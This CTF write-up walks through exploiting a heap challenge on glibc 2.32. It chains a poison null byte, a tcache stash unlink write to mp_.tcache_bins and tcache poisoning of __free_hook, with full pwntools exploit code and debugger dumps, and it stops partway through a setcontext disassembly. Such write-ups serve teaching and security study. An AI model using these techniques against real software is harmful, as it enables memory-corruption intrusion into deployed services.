A few weeks ago, I played with DiceGang in Asis Finals CTF. Yet Another House was one of the heap pwnables, and it had only one solve (which was by us). The general gist of it involved doing a glibc 2.32 poison null byte attack without a heap leak, a tcache stash unlink attack to overwrite mp_.tcache_bins, and a tcache poison for a controlled arbitrary write to escape seccomp for the flag. I didn't originally plan on making a writeup for this, but when redoing this complex pwnable a few weeks later, I thought it would be good to make some detailed notes so I don't forget these techniques.
Before I start, I would like to thank the teammates who worked with me on this: Poortho (who did the majority of the work and blooded it), NotDeGhost, Asphyxia, and noopnoop.
Initial Work:
One thing to note immediately is the patch the author introduced into the glibc library.
By glibc 2.32, there are many more mitigations. As documented in my Player2 writeup, glibc introduced a mitigation against the poison null byte where it checks that the size header matches the prev_size header before back coalescing. However, this time, we cannot just forge some headers easily like in Player2 via a heap leak to beat the unlink check. We will have to use the fact that glibc doesn't zero out the pointers for heap operations involving the unsorted and large bins (each uniquely sized chunk in a largebin has two sets of pointers, the bottom two being fd_nextsize and bk_nextsize, which help it maintain the sorted order). This technique has been documented in the following links (though some of them rely on the aid of fastbin pointers, which we do not have): BalsnCTF Plainnote writeup, poison null byte techniques, 2.29 off by null bypass (as with many pwnable techniques, Chinese CTF players document some of the coolest and most obscure tricks, and Google Translate should suffice).
An interesting thing to note is that by 2.32, the tcache_perthread_struct no longer uses uint8_t to store tcache counts; it now uses uint16_t. Hence, if we can place chunks of around size 0x1420 and up into the tcache_perthread_struct, the memset will not be able to wipe the tcache count (or the pointer). Some of you may recall that the tcache count did not used to matter as long as you had a pointer in the tcache_perthread_struct (I believe those checks were once asserts in tcache_get that got compiled out for release builds), but now there are sanity checks against such behavior; this is why we need the chunks destined for the tcache to belong to a bin whose count lies outside the memset range.
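To see where that 0x1420 figure comes from, here is a quick sanity check, assuming the stock 2.32 tcache_perthread_struct layout (64 uint16_t counts followed by 64 entry pointers) and assuming the challenge patch memsets the first 0x280 bytes of that struct on every malloc (the 0x280 figure comes up again later):
MINSIZE, MALLOC_ALIGNMENT, TCACHE_MAX_BINS = 0x20, 0x10, 64

def csize2tidx(sz):
    # same formula as the glibc macro
    return (sz - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT

idx = csize2tidx(0x1420)                     # = 0x140
count_off = 2 * idx                          # counts[] starts at offset 0 -> 0x280
entry_off = 2 * TCACHE_MAX_BINS + 8 * idx    # entries[] starts right after counts -> 0xa80
assert count_off >= 0x280 and entry_off >= 0x280   # both land past the wipe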
In order to expand the size of chunks we can place into the tcache, we can attack the malloc_par struct, with the symbol mp_ in libc. Take careful note of the tcache_bins member.
struct malloc_par
{
  /* Tunable parameters */
  unsigned long trim_threshold;
  INTERNAL_SIZE_T top_pad;
  INTERNAL_SIZE_T mmap_threshold;
  INTERNAL_SIZE_T arena_test;
  INTERNAL_SIZE_T arena_max;
  /* Memory map support */
  int n_mmaps;
  int n_mmaps_max;
  int max_n_mmaps;
  /* the mmap_threshold is dynamic, until the user sets
     it manually, at which point we need to disable any
     dynamic behavior. */
  int no_dyn_threshold;
  /* Statistics */
  INTERNAL_SIZE_T mmapped_mem;
  INTERNAL_SIZE_T max_mmapped_mem;
  /* First address handed out by MORECORE/sbrk. */
  char *sbrk_base;
#if USE_TCACHE
  /* Maximum number of buckets to use. */
  size_t tcache_bins;
  size_t tcache_max_bytes;
  /* Maximum number of chunks in each bucket. */
  size_t tcache_count;
  /* Maximum number of chunks to remove from the unsorted list, which
     aren't used to prefill the cache. */
  size_t tcache_unsorted_limit;
#endif
};
By overwriting tcache_bins with a large value (such as a libc address), we can place larger chunks into the tcache and bypass the wipe.
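As a sanity check on where that write needs to land (the final payload targets mp_ + 80), here is a rough field-offset walk assuming the usual LP64 sizes; this is inferred from the struct above rather than read out of debug symbols:
offsets, off = {}, 0
for name, sz in [('trim_threshold', 8), ('top_pad', 8), ('mmap_threshold', 8),
                 ('arena_test', 8), ('arena_max', 8),
                 ('n_mmaps', 4), ('n_mmaps_max', 4), ('max_n_mmaps', 4), ('no_dyn_threshold', 4),
                 ('mmapped_mem', 8), ('max_mmapped_mem', 8), ('sbrk_base', 8),
                 ('tcache_bins', 8), ('tcache_max_bytes', 8), ('tcache_count', 8),
                 ('tcache_unsorted_limit', 8)]:
    off = (off + sz - 1) & ~(sz - 1)   # natural alignment
    offsets[name] = off
    off += sz
assert offsets['tcache_bins'] == 80    # matches the mp_ + 80 target used later in the exploit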
Normally, this type of write makes me think of an unsorted bin or largebin attack. However, since 2.28, the unsorted bin attack has been patched out with a bck->fd != victim check, and in 2.30, the largebin attack has been hardened against, though how2heap still shows a potential way to perform it (I took a closer look at the newer version of this attack after the CTF; while I did not test whether it would actually work in this challenge, it could potentially have offered a much easier alternative with a simpler setup). Another way to achieve this write in glibc 2.32 is what is known as the tcache stashing unlink attack, which I learned about from the following links: Heap Exploit v2.31, Tcache Stashing Unlink Attack.
The relevant source for this attack is here:
#if USE_TCACHE
  /* While we're here, if we see other chunks of the same size,
     stash them in the tcache. */
  size_t tc_idx = csize2tidx (nb);
  if (tcache && tc_idx < mp_.tcache_bins)
    {
      mchunkptr tc_victim;
      /* While bin not empty and tcache not full, copy chunks over. */
      while (tcache->counts[tc_idx] < mp_.tcache_count
             && (tc_victim = last (bin)) != bin)
        {
          if (tc_victim != 0)
            {
              bck = tc_victim->bk;
              set_inuse_bit_at_offset (tc_victim, nb);
              if (av != &main_arena)
                set_non_main_arena (tc_victim);
              bin->bk = bck;
              bck->fd = bin;
              tcache_put (tc_victim, tc_idx);
            }
        }
    }
Basically, when we have chunks inside a specific smallbin, causing malloc to pull from this smallbin triggers a transfer of the remaining chunks into the respective tcache bin afterwards. Notice the bck = tc_victim->bk and bck->fd = bin lines in the stashing process. By corrupting the bk pointer of a smallbin chunk, we can write a libc address to a selected address + 0x10. We must take care to do this only when the tcache is one slot away from being full, so the stashing procedure ends immediately afterwards and avoids any further corruption. Most writeups start out with 6 chunks in the tcache bin and 2 in the smallbin, so you can pull one chunk out of the smallbin, corrupt the bk of the last one (smallbins are FIFO structures with chunks removed from the tail), trigger the stash process, and have it end immediately as the tcache becomes full. However, in this case, our tcache_perthread_struct always gets wiped, so we actually need 8 chunks in the smallbin: 1 to pull out, 6 to stash, and the final one to stash and perform the write. Regardless of what happens, this smallbin will be corrupted and cannot be used again. If curious, readers can check out the stash unlink+ and stash unlink++ variants of this attack to get an arbitrary address allocation, or an arbitrary address allocation plus a write of a libc address somewhere in memory.
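To make the write concrete, here is a minimal sketch of what the corrupted bk buys us, using the mp_.tcache_bins target from this challenge (offset 80 is the assumption computed earlier; in the actual exploit the bk gets planted via a chunk overlap rather than a direct edit):
# during the final iteration of the stash loop:
#   bck = tc_victim->bk          # our forged value: target - 0x10
#   bin->bk = bck                # the smallbin head now points into mp_, corrupting the bin for good
#   bck->fd = bin                # *(target) = address of the smallbin head inside main_arena
target = libc.symbols['mp_'] + 80       # mp_.tcache_bins (assumed offset)
forged_bk = p64(target - 0x10)          # overwrites the bk of the last chunk to be stashed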
One more new protective feature in libc 2.32 is pointer obfuscation/safe-linking, which I discussed previously in my CUCTF Dr. Xorisaurus writeup: for singly linked lists, (stored pointer) = (address of fd pointer >> 12) ^ (fd pointer). Once we achieve a heap leak, this protection is trivial to beat, and the new aligned-address check for these lists won't matter as we will be targeting __free_hook.
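For reference, the mangling is simple enough to model directly; this mirrors the computation used later in the exploit when poisoning the fd:
def protect_ptr(pos, ptr):
    # pos is the address where the fd pointer itself is stored
    return (pos >> 12) ^ ptr

def reveal_ptr(pos, stored):
    return (pos >> 12) ^ stored

# e.g. the poisoned fd later on:
#   protect_ptr(heapbase + 0x2050, libc.symbols['__free_hook'])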
Lastly, since this writeup requires a lot of heap massaging involving the smallbin and largebin, I recommend reviewing this page from the Heap Book for all the conditions. It didn't turn out too bad when writing this exploit, as a lot of it just relied on intuition and checking in a debugger.
Exploit Development:
I recommend following along closely with a debugger, as I might have misexplained a small step here and there due to the complexity of this exploit.
To start off, I wrote some helper functions:
def wait():
    p.recvrepeat(0.1)

def alloc(size, data, line=True):
    assert(size > 0x100 and size <= 0x2000)
    if len(data) == size:
        line = False
    wait()
    p.sendline('1')
    wait()
    p.send(str(size))
    wait()
    if line:
        p.sendline(data)
    else:
        p.send(data)

def free(idx):
    wait()
    p.sendline('2')
    wait()
    p.sendline(str(idx))

def leak(idx):
    wait()
    p.sendline('3')
    wait()
    p.sendline(str(idx))

def edit(idx, data, line=True):
    wait()
    p.sendline('4')
    wait()
    p.sendline(str(idx))
    wait()
    if line:
        p.sendline(data)
    else:
        p.send(data)
Our first goal is to create a massive back coalesce with the poison null byte so we can perform overlaps. This part took quite a while, but Asphyxia ended up figuring this out late at night with the following general technique using largebins, unsorted bins, and normal back coalescing.
Several chunks are allocated, and then three chunks of different sizes (but belonging to the same largebin) are freed into the unsorted bin. A chunk larger than all three is then requested, causing a new chunk to be pulled from the wilderness and the 3 unsorted chunks to be sorted into the same largebin in order, with 2 sets of pointers filled for each since they have unique sizes. Notice how the middle-sized one has its first set of pointers located at an address ending in a null byte; this is purposeful, as we will later forge a fake size header over that first set of pointers, and we can perform partial overwrites on other chunks' dangling pointers with just a single null byte from the alloc function to align them and pass the unlink check.
alloc(0x438, 'A' * 0x438) # 0
alloc(0x448, 'B' * 8) # 1, leave fd_nextsize part be null if target to backward consolidate onto is of large size
alloc(0x108, 'test') # 2
alloc(0x438, 'C' * 0x438) # 3, smaller than B
alloc(0x108, 'test') # 4
alloc(0x418, 'D' * 0x418) # 5
alloc(0x458, 'E' * 0x458) # 6, bigger than B
alloc(0x108, 'test') # 7
free(1)
free(3)
free(6)
alloc(0x500, 'test') # 1, trigger largebin allocation, because of different sizes, we'll have 2 sets of pointer in each chunk in largebin
unsortedbin
all: 0x0
smallbins
empty
largebins
0x440: 0x55e0675e35c0 —▸ 0x55e0675e26f0 —▸ 0x55e0675e2c50 —▸ 0x7f23ee201000 (main_arena+1120) ◂— 0x55e0675e35c0
Note that I didn't fill the middle chunk with as many characters, since I will soon forge a fake chunk header there; it will be the target to back coalesce onto. As the back coalesce region will be quite large, I have to leave the part after the pointers as null bytes (or at least the one qword right after them), because glibc's unlink performs additional operations when the previous chunk is of large size and has a non-null fd_nextsize pointer.
Next, Asphyxia freed the chunk before the middle largebin chunk, causing it to back coalesce (while leaving the 2 sets of pointers behind for me to use) and go into the unsorted bin. Another allocation is then made so that the first set of leftover pointers can be used to fake a chunk header, and the next set can be used as part of the way to beat the unlink checks (I chose a fake chunk size of 0x2150).
free(0) # backwards consolidate to help us start forging size, this goes to unsorted now from largebin, also have largebin pointers now from the chunk it coalesced from
alloc(0x438 + 0x30, 'A' * 0x448 + p64(0x2151)[:-1]) # 0, to help forge chunk header
unsortedbin
all: 0x55e0675e2720 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e2720
smallbins
empty
largebins
0x440: 0x55e0675e35c0 —▸ 0x55e0675e2c50 —▸ 0x7f23ee201000 (main_arena+1120) ◂— 0x55e0675e35c0
pwndbg> x/20gx 0x55e0675e2720-0x50
0x55e0675e26d0: 0x4141414141414141 0x4141414141414141
0x55e0675e26e0: 0x4141414141414141 0x4141414141414141
0x55e0675e26f0: 0x4141414141414141 0x4141414141414141
0x55e0675e2700: 0x4141414141414141 0x0000000000002151
0x55e0675e2710: 0x000055e0675e2c50 0x000055e0675e35c0
0x55e0675e2720: 0x0000000000000000 0x0000000000000421
0x55e0675e2730: 0x00007f23ee200c00 0x00007f23ee200c00
0x55e0675e2740: 0x0000000000000000 0x0000000000000000
0x55e0675e2750: 0x0000000000000000 0x0000000000000000
0x55e0675e2760: 0x0000000000000000 0x0000000000000000
Then, we cleared out the unsorted bin and recovered the other two largebin chunks, to then build an unsorted chain. The order of freeing matters here for the unsorted bin. We want the chunk underneath the fake header to sit in the middle, so that its address in the unsorted chain can be redirected to the fake chunk with just a single null-byte overwrite (as the addresses are all in the 0x......7XX range).
alloc(0x448-0x30, 'B' * (0x448-0x30)) # 3, clear our unsorted bin, also very important because this will be linked into the unsorted chain to help us with the dangling pointer partial overwrite
# 0, 1, 2, 3, 4, 5, 7
# now recover large bins and bring stuff back into unsorted
alloc(0x438, 'C' * 0x438) # 6
alloc(0x458, 'E' * 0x458) # 8
# 0, 1, 2, 3, 4, 5, 6, 7, 8
free(6) # unsorted chain
free(3)
free(8)
unsortedbin
all: 0x55e0675e35c0 —▸ 0x55e0675e2720 —▸ 0x55e0675e2c50 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e35c0
smallbins
empty
largebins
empty
pwndbg> x/4gx 0x55e0675e35c0
0x55e0675e35c0: 0x0044444444444444 0x0000000000000461
0x55e0675e35d0: 0x000055e0675e2720 0x00007f23ee200c00
pwndbg> x/4gx 0x55e0675e2720
0x55e0675e2720: 0x0000000000000000 0x0000000000000421
0x55e0675e2730: 0x000055e0675e2c50 0x000055e0675e35c0
pwndbg> x/4gx 0x55e0675e2c50
0x55e0675e2c50: 0x0000000000000000 0x0000000000000441
0x55e0675e2c60: 0x00007f23ee200c00 0x000055e0675e2720
Now we want to recover the 0x440 chunk from the unsorted bin and write a single null byte there to satisfy the fd->bk == P check. We want to do the same thing on the 0x460 chunk; to preserve its pointers, we back coalesce it with the chunk before it. Then, an allocation can be made to place a null byte that changes the 0x720 ending into a 0x700 ending, and the unlink check will be satisfied. Later on, when I trigger the malicious back coalesce, I will also get some heap pointers into these two chunks for a heap leak due to how unlink works. Notice how the forged chunk now has the perfect pointer chain set up to pass the unlink check.
free(5) # coalesce in unsorted to get leftover pointers
# 0, 1, 2, 4, 7
# with unlink, 3 and end of 5 will be getting heap pointers (but 5 will have nulls in front because of forged size metadata)
alloc(0x438, 'C' * 8) # 3, fix the fd pointer, pulling back from unsorted
alloc(0x418 + 0x20, 'D' * (0x418) + p64(0x461)) # 5, fix the bk pointer, pulling from the one I coalesced, sorts an unsorted chunk to largebin
# 0, 1, 2, 3, 4, 5, 7
log.info("finished heap massage")
pwndbg> x/4gx 0x55e0675e2700
0x55e0675e2700: 0x4141414141414141 0x0000000000002151
0x55e0675e2710: 0x000055e0675e2c50 0x000055e0675e35c0
pwndbg> x/4gx 0x000055e0675e2c50
0x55e0675e2c50: 0x0000000000000000 0x0000000000000441
0x55e0675e2c60: 0x4343434343434343 0x000055e0675e2700
pwndbg> x/4gx 0x000055e0675e35c0
0x55e0675e35c0: 0x4444444444444444 0x0000000000000461
0x55e0675e35d0: 0x000055e0675e2700 0x00007f23ee200c00
Afterwards, I cleaned up the remaining largebin and unsorted bin, and performed a few more allocations just to expand the number of chunks that would end up overlapped. I then allocated a few more chunks of size 0x110 (which I will use later for the tcache stash unlink attack), with some additional fake chunk metadata that lets me free a fake 0x1510 chunk later for the tcache poison. The final 0x110 chunk I allocated is only meant to prevent consolidation later, depending on the order in which I build my smallbin chain; I cannot actually use it, as this extra slot is crucial for the later massage.
I then triggered the poison null byte after setting the correct prev_size metadata, and freeing the poisoned chunk created a massive unsorted chunk that overlapped a lot of memory.
# at this point we have an unsorted and largebin, let's clean up the unsorted and largebin
alloc(0x430, 'test') # 6
alloc(0x410, 'test') # 8
alloc(0x808, 'G' * 0x808) # 9
alloc(0x4f8, 'H' * 0x4f8) # 10
alloc(0x468, 'temp') # 11
# for stashing into tcache (since tcache won't get wiped unless we call malloc in this program)
alloc(0x108, 'stash') # 12
alloc(0x108, 'stash') # 13
alloc(0x108, 'stash') # 14
alloc(0x108, 'stash' + '\x00' * 3 + p64(0) + (p64(0) + p64(0x21)) * 13) # 15, for the later 0x1510 fake chunk that i will free to tcache poison
alloc(0x108, 'stash') # 16
alloc(0x108, 'stash') # 17
alloc(0x108, 'temp') # 18, so no back coalescing later when we send 17 to unsorted
free(18)
edit(9, (p64(0) + p64(0x21)) * (0x800 / 16) + p64(0x2150), line=False)
# back coalesce
free(10)
log.info("achieved backwards coalesce")
unsortedbin
all: 0x55e0675e2700 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e2700
smallbins
empty
largebins
empty
pwndbg> x/4gx 0x55e0675e2700
0x55e0675e2700: 0x4141414141414141 0x0000000000002651
0x55e0675e2710: 0x00007f23ee200c00 0x00007f23ee200c00
Now chunk 3 will have heap pointers. Chunk 5 also does, but my forged size metadata comes before it so you won't be able to leak it from there.
Here, some serious heap massaging begins. During the CTF, Poortho managed to massage it cleanly in 2-3 hours (basically carrying us to the first blood); I remember his exploit having several dangling unsorted and small chains around so it is quite impressive that he managed to keep the heap stable. It took me much longer to massage the heap, and I had to keep it as clean as possible to avoid breaking it.
Since the libc address in the unsorted chunk starts with a null byte in memory (main_arena+96 ends in 0x00 and is stored little-endian), I had to find a way to get a largebin pointer placed at the beginning of my chunk data for the libc leak. I achieved this by first aligning the unsorted chunk with one of my chunk data addresses, then allocating a very large chunk (greater than the unsorted size) to trigger largebin activity, which provided me with a libc leak. Two operations were also performed to fix some of the chunks' size metadata that got corrupted and overwritten during these heap manipulations (though they turned out to be unnecessary, as I had to change all of them again in the next stage of the exploit). Lastly, I allocated another 0x110 chunk into index 10, and used that as an opportunity to fix index 8's chunk size to something valid that free() will accept.
# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17
# everything from 0 - 9 is overlapped
leak(3)
heapbase = u64(p.recv(14)[8:].ljust(8, '\x00')) - 0x15c0
log.info('heap base: 0x%x' % heapbase)
# libc 2.32 has null ending for main arena + 96 libc address
alloc(0xa90, p64(0) * 3 + p64(0x421)) # 10, should align right over index 5, fix size of index 8
alloc(0x2000, 'test') # 18 send unsorted chunk into largebin, get largebin pointers into index 5
leak(5)
libcleak = u64(p.recv(6).ljust(8, '\x00'))
libc.address = libcleak - 0x1bf270
log.info('libc base: 0x%x' % libc.address)
free(18)
free(10) # go back up
# fixing index 5 size
alloc(0x670, 'test') # 10
alloc(0x430, (p64(0) + p64(0x21)) * (0x410 / 16) + p64(0) + p64(0x441)) # 18
# recoalesce it up
free(18)
free(10)
alloc(0x108, p64(0) * 2 + (p64(0) + p64(0x21))*5) # 10, fix size of index 8
A general technique I used above, and one that I will keep using to fake sizes or forge metadata: allocate one or two large chunks from the unsorted bin to reach the target location, write the data upon allocation, and then free them in the reverse order of allocation so they coalesce back and the unsorted bin's state is restored. A sketch of this pattern follows.
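Here is the two-chunk variant as a minimal sketch, using the helper functions from earlier; the slot indices are whatever free spots the program hands out, so the caller passes them in (this illustrates the pattern rather than being code lifted from my exploit):
def overlap_write(pad_size, write_size, payload, idx_pad, idx_write):
    # carve a padding chunk plus a write chunk out of the big unsorted chunk,
    # so the second allocation's data lands over the target metadata
    alloc(pad_size, '\x00')        # fills program slot idx_pad
    alloc(write_size, payload)     # fills program slot idx_write and performs the write
    # free in reverse order so everything coalesces back into one big unsorted chunk
    free(idx_write)
    free(idx_pad)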
In order to perform a tcache stash attack in a scenario where the tcache_perthread_struct gets wiped on each malloc(), we need 15 chunks of size 0x110 to free. The first 7 go into the tcache, and the next 8 are freed into the unsorted bin (where we have to be very careful to avoid chunk coalescing). From there, we can trigger malloc to move all of them into the smallbin, and overlap the chunk that was inserted into the 0x110 smallbin last so its bk pointer can be tampered with; this way we can still perform the stash attack without crashing and have the final chunk entering the tcache perform the write. At the current stage, we only have 0x110 chunks in 12, 13, 14, 15, 16, 17, 2, 4, 7, 10, so we will need 5 more. Here is the program's chunk array as of now:
0x55e06625f520: 0x000055e0675e22c0 0x000055e0675e3b40 S
0x55e06625f530: 0x000055e0675e2b50 X 0x000055e0675e2c60
0x55e06625f540: 0x000055e0675e30a0 X 0x000055e0675e31b0
0x55e06625f550: 0x000055e0675e35f0 S 0x000055e0675e3a30 X
0x55e06625f560: 0x000055e0675e2730 0x000055e0675e4050 S
0x55e06625f570: 0x000055e0675e2710 X 0x000055e0675e4d60
0x55e06625f580: 0x000055e0675e51d0 X 0x000055e0675e52e0 X
0x55e06625f590: 0x000055e0675e53f0 X 0x000055e0675e5500 X
0x55e06625f5a0: 0x000055e0675e5610 X 0x000055e0675e5720 X
0x55e06625f5b0: 0x0000000000000000
The ones marked with X are the 0x110 chunks (or at least they should have that size; I have to repair some of them later). The ones marked with S are towards the end of the unsorted overlap, and hence I would like to save them for the overlap writes later. I planned on saving one for the tcache poison, one for the smallbin bk pointer corruption, and one extra for backup/padding purposes (in the end, I didn't even need it); these were indices 1, 6, and 9.
To free up the other chunks, I applied the technique mentioned above (allocate one or two chunks, write the correct size or just spam 0x21 sizes, and recoalesce back to restore the unsorted chunk): on chunks 3 and 5 to turn them into isolated 0x20-sized chunks (index 8's size had already been changed in the last 0x110 allocation), on chunk 9 to give it size 0x1510, and one last time to fix some of the 0x110 chunk size metadata that I may have overwritten. Chunk 11 can be freed before all of these operations by just letting it back coalesce into the large unsorted chunk. I also freed 0, which adds one more chunk into the unsorted bin, but luckily it didn't raise any new issues in the later heap massage. We should have 6 free slots at this point: 5 for the additional 0x110 chunks and one for padding/alignment purposes to create an overlap.
# coalesce 11 into big unsorted
free(11)
# fix index 3, remember to fix the 0x111 metadata issue (for 2, 4, 7), but we can repair this later
alloc(0x480, (p64(0) + p64(0x21)) * (0x430 / 16) + (p64(0) + p64(0x21)) * 5) # 11
free(11)
free(3)
# fix index 5
alloc(0x900, '\x00') # 3
alloc(0x430, (p64(0) + p64(0x21)) * (0x80 / 2) + (p64(0) + p64(0x21)) * 10) # 11
free(11)
free(3)
free(5)
# free index 8 now too, could have been done earlier
free(8)
# fix index 9 to size metadata 0x1511 for potential tcache poison
alloc(0x17f0, '\x00') # 3
alloc(0x430, (p64(0) + p64(0x21)) * 2 + p64(0) + p64(0x1511)) # 5, around size 0x1420~0x1430ish to escape the memset on tcache_perthread_struct
free(5)
free(3)
# repair the 0x111 size for 2, 4, 7 (7 is still clean, so it's good) note how among 1, 6, 9, only 6 is before one of the 0x110 chunks? use 6 for the bk overwrite
alloc(0x820, (p64(0) + p64(0x21)) * (0x320 / 16) + p64(0) + p64(0x111)) # 3
alloc(0x450, (p64(0) + p64(0x21)) * 4 + p64(0) + p64(0x111)) # 5
free(5)
free(3)
log.info('hopefully cleaned up heap')
# get another unsorted
free(0)
Now, I added 5 more 0x110 chunks. This cannot be done directly. Rather, I performed the allocations (and some frees) in such a way that the unsorted chunk created from freeing chunk 0 runs out after three 0x110 allocations. Then I allocated another 0x110 chunk, allocated a large chunk that extends into index 6's data (which we control), and allocated a 0x110 chunk from there (providing us with an overlap over a potential smallbin chunk). Since this last chunk will pass through the unsorted bin before reaching the smallbin, I had to ensure it would not coalesce with the neighboring unsorted chunk, so I freed a previous 0x110 chunk and allocated one more from the unsorted bin to act as a guard chunk; the nice thing about the tcache memset is that I can free smaller chunks like these to help with the heap massage without worrying about them coming back.
One thing to note is why I chose index 6 as the chunk to overlap for overwriting the last smallbin chunk's bk. As mentioned in the code comments, it's because there was a 0x110 chunk right after it, and it was also the first of the three chunks I kept in memory.
# empty are 0 3 5 8 11 18, until the newly added unsorted bin from freeing 0 runs out, the large chunk will be in largebin, but then will move back to unsorted since the new unsorted can't support all 5 allocations
alloc(0x108, 'stash') # 0
alloc(0x108, 'stash') # 3
alloc(0x138, 'stash') # 5 (otherwise metadata for 10 gets overwritten)
free(5)
alloc(0x108, 'temp') # 5
alloc(0x108, 'stash') # 8
# now allocate a big one so next one can overlap with 6
alloc(0xd10, '\x00') # 11
alloc(0x108, 'stash') # 18
free(5)
alloc(0x108, 'stash') # 5, free this one early on so it goes into tcache, and helps prevent 18 from consolidating with unsorted
At this stage, we have 15 chunks of 0x110 size: indices 0, 2, 3, 4, 5, 7, 8, 10, 12, 13, 14, 15, 16, 17, 18. To avoid any coalescing and keep this number of chunks for the tcache and smallbin frees, I closely considered the following rules (which you can verify by debugging):
1. 12 to 17 is a chain (17 won't coalesce into top even if it is treated as unsorted due to a guard chunk placed below early on)
2. 12 will back coalesce into the large unsorted if not entered into tcache.
3. 0, 3 is a chain
4. 8, 10 is a chain
5. 5 is on top of the big unsorted chunk
6. 2, 4 are isolated
7. 7 has the potential to go into unsorted and merge with a smallbin
8. 18 must be the last one into the smallbin
Following these observations, I performed the following free chain: 14, 16, 3, 10, 5, 12, 7 (tcache filled, now into unsorted), 17, 2, 13, 15, 0, 8, 4, 18. I then made a larger allocation to trigger the transfer of the 8 unsorted 0x110 chunks into the smallbin, and freed this larger chunk to restore the large unsorted bin's state.
free(14)
free(16)
free(3)
free(10)
free(5)
free(12)
free(7)
free(17)
free(2)
free(13)
free(15)
free(0)
free(8)
free(4)
free(18)
# only 1, 6, 9, 11 still left
alloc(0x450, '\x00') # 0, trigger movement from unsorted chain to smallbin for the 0x110 chunks
free(0)
Note that pwndbg labels the doubly linked bins as corrupted whenever I go over 4-5 chunks in them, but in reality, they are fine.
tcachebins
empty
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x55e0675e3860 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e3860
smallbins
0x110 [corrupted]
FD: 0x55e0675e3640 —▸ 0x55e0675e3090 —▸ 0x55e0675e2810 —▸ 0x55e0675e22b0 —▸ 0x55e0675e54f0 ◂— ...
BK: 0x55e0675e5710 —▸ 0x55e0675e2b40 —▸ 0x55e0675e52d0 —▸ 0x55e0675e54f0 —▸ 0x55e0675e22b0 ◂— ...
largebins
empty
Since we don't have edit available anymore, I had to free index 6 into the unsorted bin and then allocate to get it back, performing the overwrite over index 18's 0x110 smallbin chunk so that a libc address gets written into mp_.tcache_bins. Making another request from the smallbin then triggers the stash. The 0x110 smallbin is corrupted afterwards, so you should avoid allocating from it again.
free(6)
payload = (p64(0) + p64(0x21)) * 5 + p64(0) + p64(0x110) + p64(heapbase + 0x1090) + p64(libc.symbols['mp_'] + 80 - 0x10) # overwrite .tcache_bins
alloc(0x430, payload) # 0, overlap smallbin 0x110 head's chunk
alloc(0x108, '\x00') # 2, trigger smallbin stash unlink
log.info('tcache stash unlinked, overwrote mp_.tcache_bin')
# can't touch 0x110 smallbin ever again
tcachebins
0x110 [ 7]: 0x55e0675e3650 ◂— 0x55e539584543
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0x110 [corrupted]
FD: 0x55e0675e3640 ◂— 0x55e539584543
BK: 0x7f23ee2002c0 (mp_+64) ◂— 0x408
largebins
0x1800: 0x55e0675e3860 —▸ 0x7f23ee201260 (main_arena+1728) ◂— 0x55e0675e3860
pwndbg> p mp_
$1 = {
  trim_threshold = 131072,
  top_pad = 131072,
  mmap_threshold = 131072,
  arena_test = 8,
  arena_max = 0,
  n_mmaps = 0,
  n_mmaps_max = 65536,
  max_n_mmaps = 0,
  no_dyn_threshold = 0,
  mmapped_mem = 0,
  max_mmapped_mem = 0,
  sbrk_base = 0x55e0675e2000 "",
  tcache_bins = 139792295660800,
  tcache_max_bytes = 1032,
  tcache_count = 7,
  tcache_unsorted_limit = 0
}
Between indices 1 and 9, I chose 9 for my tcache poison. To set this up, I first allocated a large enough chunk to shrink the unsorted chunk so that a 0x1510 request would pull from the wilderness instead. I then freed this new chunk, followed by index 9 (which had its size overwritten to 0x1510). Due to the new mp_.tcache_bins value, a tcache chain is created here that is not reached by the 0x280-byte memset hooked onto malloc.
Then, I pulled a chunk from the large unsorted chunk to overlap what was index 9 and, following the pointer obfuscation rules, changed its fd to point to __free_hook.
# 0, 1, 2, 9, 11, use 9 as the target for tcache poison, 1 was leftover but doesn't matter really (was a mistake on my part, but good that i still saved as a backup)
alloc(0x780, '\x00') # 3
alloc(0x1500, p64(0) * 4 + 'fizzbuzz') # 4
free(4)
free(9) # created tcache chain
malicious_addr = ((heapbase + 0x2050) >> 12) ^ libc.symbols['__free_hook']
alloc(0x400, p64(0) * 9 + p64(0x1511) + p64(malicious_addr)[:-1]) # 4, tcache poison
Now, we must decide how to escape the seccomp filter. Of course, we will need an open/read/write ROP chain, but how can we pivot with only control over __free_hook (which only gives us control over rdi)?
One idea we had was setcontext, a well-known function to use for a stack pivot.
Dump of assembler code for function setcontext:
0x00007f23ee08e520 <+0>: endbr64
0x00007f23ee08e524 <+4>: push rdi
0x00007f23ee08e525 <+5>: lea rsi,[rdi+0x128]
0x00007f23ee08e52c <+12>: xor edx,edx
0x00007f23ee08e52e <+14>: mov edi,0x2
0x00007f23ee08e533 <+19>: mov r10d,0x8
0x00007f23ee08e539 <+25>: mov eax,0xe
0x00007f23ee08e53e <+30>: syscall
0x00007f23ee08e540 <+32>: pop rdx
0x00007f23ee08e541 <+33>: cmp rax,0xfffffffffffff001
0x00007f23ee08e547 <+39>: jae 0x7f23ee08e66f <setcontext+335>
0x00007f23ee08e54d <+45>: mov rcx,QWORD PTR [rdx+0xe0]
0x00007f23ee08e554 <+52>: fldenv [rcx]
0x00007f23ee08e556 <+54>: ldmxcsr DWORD PTR [rdx+0x1c0]
0x00007f23ee08e55d <+61>: mov rsp,QWORD PTR [rdx+0xa0]
0x00007f23ee08e564 <+68>: mov rbx,QWORD PTR [rdx+0x80]
0x00007f23ee08e56b <+75>: mov rbp,QWORD PTR [rdx+0x78]
0x00007f23ee08e56f <+79>: mov r12,QWORD PTR [rdx+0x48]
0x00007f23ee08e573 <+83>: mov r13,QWORD PTR [rdx+0x50]
0x00007f23ee08e577 <+87>: mov r14,QWORD PTR [rdx+0x58]
0x00007f23ee08e57b <+91>: mov r15,QWORD PTR [rdx+0x60]
